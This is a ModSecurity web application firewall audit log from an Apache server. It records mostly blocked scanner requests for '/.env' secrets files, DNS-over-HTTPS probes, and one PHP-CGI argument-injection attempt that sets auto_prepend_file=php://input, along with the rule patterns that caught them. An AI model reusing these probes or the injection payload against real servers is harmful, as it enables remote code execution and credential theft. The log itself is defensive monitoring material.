Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745971415013816 754 (- - -)
Stopwatch2: 1745971415013816 754; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c9280108-Z--
--1072295b-A--
[30/Apr/2025:07:06:12 +0700] aBFpdDsHLQ2TK6eM3eo9zQAAAJA 103.236.140.4 35124 103.236.140.4 8181
--1072295b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.84 Safari/537.36
Accept-Charset: utf-8
--1072295b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1072295b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745971572043227 799 (- - -)
Stopwatch2: 1745971572043227 799; combined=364, p1=326, p2=0, p3=0, p4=0, p5=38, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1072295b-Z--
--d9ed2059-A--
[30/Apr/2025:07:06:35 +0700] aBFpizsHLQ2TK6eM3eo9zwAAAI8 103.236.140.4 35214 103.236.140.4 8181
--d9ed2059-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 152.70.44.251
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 152.70.44.251
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--d9ed2059-C--
--d9ed2059-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d9ed2059-E--
--d9ed2059-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745971595422577 4822 (- - -)
Stopwatch2: 1745971595422577 4822; combined=3090, p1=502, p2=2554, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d9ed2059-Z--
--2069bf69-A--
[30/Apr/2025:07:43:06 +0700] aBFyGtmPDA_SdVd56wDzGQAAAMk 103.236.140.4 43926 103.236.140.4 8181
--2069bf69-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 92.204.144.151
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 92.204.144.151
X-Forwarded-Proto: https
Connection: close
Accept: */*
--2069bf69-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2069bf69-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745973786809253 740 (- - -)
Stopwatch2: 1745973786809253 740; combined=286, p1=248, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2069bf69-Z--
--8e595e61-A--
[30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQSAAAABU 103.236.140.4 36704 103.236.140.4 8181
--8e595e61-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.245.117.221
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.245.117.221
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--8e595e61-C--
Ó examplecom
--8e595e61-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8e595e61-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745980109175845 3026 (- - -)
Stopwatch2: 1745980109175845 3026; combined=2053, p1=484, p2=1487, p3=23, p4=29, p5=30, sr=61, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8e595e61-Z--
--a026cc69-A--
[30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQSwAAABc 103.236.140.4 36710 103.236.140.4 8181
--a026cc69-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.245.117.221
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.245.117.221
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--a026cc69-C--
èg examplecom
--a026cc69-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a026cc69-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745980109230583 2757 (- - -)
Stopwatch2: 1745980109230583 2757; combined=1870, p1=430, p2=1373, p3=20, p4=22, p5=25, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a026cc69-Z--
--0c22a274-A--
[30/Apr/2025:09:28:29 +0700] aBGKzTsHLQ2TK6eM3epLCAAAAJY 103.236.140.4 36720 103.236.140.4 8181
--0c22a274-B--
POST /query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.245.117.221
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.245.117.221
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--0c22a274-C--
x— examplecom
--0c22a274-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0c22a274-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745980109284745 3439 (- - -)
Stopwatch2: 1745980109284745 3439; combined=2268, p1=500, p2=1687, p3=23, p4=28, p5=29, sr=107, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0c22a274-Z--
--47a1e844-A--
[30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQTgAAABQ 103.236.140.4 36726 103.236.140.4 8181
--47a1e844-B--
POST /query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.245.117.221
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.245.117.221
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--47a1e844-C--
’f examplecom
--47a1e844-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--47a1e844-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745980109339285 2894 (- - -)
Stopwatch2: 1745980109339285 2894; combined=2059, p1=400, p2=1592, p3=20, p4=22, p5=25, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--47a1e844-Z--
--17eaa379-A--
[30/Apr/2025:09:28:29 +0700] aBGKzdBN0baiHx4WjiZpUAAAAEs 103.236.140.4 36744 103.236.140.4 8181
--17eaa379-B--
POST /resolve HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.245.117.221
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.245.117.221
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--17eaa379-C--
Ï& examplecom
--17eaa379-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--17eaa379-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745980109608873 3760 (- - -)
Stopwatch2: 1745980109608873 3760; combined=2651, p1=554, p2=1996, p3=28, p4=33, p5=40, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--17eaa379-Z--
--51825134-A--
[30/Apr/2025:09:28:29 +0700] aBGKzdBN0baiHx4WjiZpUwAAAFE 103.236.140.4 36754 103.236.140.4 8181
--51825134-B--
POST /resolve HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.245.117.221
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.245.117.221
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--51825134-C--
T examplecom
--51825134-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--51825134-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745980109668016 3497 (- - -)
Stopwatch2: 1745980109668016 3497; combined=2338, p1=527, p2=1729, p3=27, p4=29, p5=26, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--51825134-Z--
--dd40077d-A--
[30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQUgAAAAQ 103.236.140.4 36760 103.236.140.4 8181
--dd40077d-B--
POST / HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.245.117.221
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.245.117.221
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--dd40077d-C--
¸à examplecom
--dd40077d-F--
HTTP/1.1 200 OK
Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT
ETag: "13cd-6034254946480"
Accept-Ranges: bytes
Content-Length: 5069
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
--dd40077d-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745980109739613 3215 (- - -)
Stopwatch2: 1745980109739613 3215; combined=1951, p1=416, p2=1458, p3=27, p4=24, p5=25, sr=64, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dd40077d-Z--
--9713c11e-A--
[30/Apr/2025:09:28:29 +0700] aBGKzT1td-6YjlnYDRKQVAAAAAs 103.236.140.4 36770 103.236.140.4 8181
--9713c11e-B--
POST / HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.245.117.221
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.245.117.221
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--9713c11e-C--
óë examplecom
--9713c11e-F--
HTTP/1.1 200 OK
Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT
ETag: "13cd-6034254946480"
Accept-Ranges: bytes
Content-Length: 5069
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
--9713c11e-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745980109794636 3300 (- - -)
Stopwatch2: 1745980109794636 3300; combined=1984, p1=420, p2=1476, p3=26, p4=24, p5=37, sr=66, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9713c11e-Z--
--2e462749-A--
[30/Apr/2025:10:58:33 +0700] aBGf6dmPDA_SdVd56wAqHAAAAMw 103.236.140.4 60506 103.236.140.4 8181
--2e462749-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 139.59.132.8
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 139.59.132.8
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--2e462749-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2e462749-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745985513501033 821 (- - -)
Stopwatch2: 1745985513501033 821; combined=341, p1=302, p2=0, p3=0, p4=0, p5=39, sr=137, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2e462749-Z--
--2d37455b-A--
[30/Apr/2025:11:24:17 +0700] aBGl8TsHLQ2TK6eM3epy6QAAAII 103.236.140.4 43358 103.236.140.4 8181
--2d37455b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 137.184.203.63
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 137.184.203.63
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--2d37455b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2d37455b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745987057115266 738 (- - -)
Stopwatch2: 1745987057115266 738; combined=299, p1=265, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2d37455b-Z--
--f0a2b24e-A--
[30/Apr/2025:12:23:44 +0700] aBGz4NmPDA_SdVd56wAw1wAAANI 103.236.140.4 57338 103.236.140.4 8181
--f0a2b24e-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 207.154.197.113
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 207.154.197.113
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--f0a2b24e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0a2b24e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745990624862716 769 (- - -)
Stopwatch2: 1745990624862716 769; combined=299, p1=256, p2=0, p3=0, p4=0, p5=43, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0a2b24e-Z--
--7a585321-A--
[30/Apr/2025:13:19:12 +0700] aBHA4NBN0baiHx4WjiacMAAAAFQ 103.236.140.4 45506 103.236.140.4 8181
--7a585321-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 164.92.244.132
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 164.92.244.132
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--7a585321-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7a585321-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745993952866305 915 (- - -)
Stopwatch2: 1745993952866305 915; combined=408, p1=367, p2=0, p3=0, p4=0, p5=41, sr=139, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7a585321-Z--
--b3df0b7b-A--
[30/Apr/2025:13:33:28 +0700] aBHEODsHLQ2TK6eM3ep56wAAAIE 103.236.140.4 48862 103.236.140.4 8181
--b3df0b7b-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 139.59.143.102
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 139.59.143.102
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--b3df0b7b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b3df0b7b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745994808529697 832 (- - -)
Stopwatch2: 1745994808529697 832; combined=298, p1=260, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b3df0b7b-Z--
--f0e37a16-A--
[30/Apr/2025:13:44:00 +0700] aBHGsDsHLQ2TK6eM3ep6HAAAAIY 103.236.140.4 51316 103.236.140.4 8181
--f0e37a16-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.175
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.175
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0
Accept-Charset: utf-8
--f0e37a16-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0e37a16-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745995440998331 757 (- - -)
Stopwatch2: 1745995440998331 757; combined=303, p1=264, p2=0, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0e37a16-Z--
--b20ce512-A--
[30/Apr/2025:13:49:02 +0700] aBHH3j1td-6YjlnYDRLKwgAAAAk 103.236.140.4 52562 103.236.140.4 8181
--b20ce512-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0
Accept-Charset: utf-8
--b20ce512-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b20ce512-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745995742635493 794 (- - -)
Stopwatch2: 1745995742635493 794; combined=341, p1=297, p2=0, p3=0, p4=0, p5=44, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b20ce512-Z--
--e80f0276-A--
[30/Apr/2025:13:50:51 +0700] aBHIS9mPDA_SdVd56wA4FgAAANE 103.236.140.4 52982 103.236.140.4 8181
--e80f0276-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3866.0 Safari/537.36
Accept-Charset: utf-8
--e80f0276-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e80f0276-H--
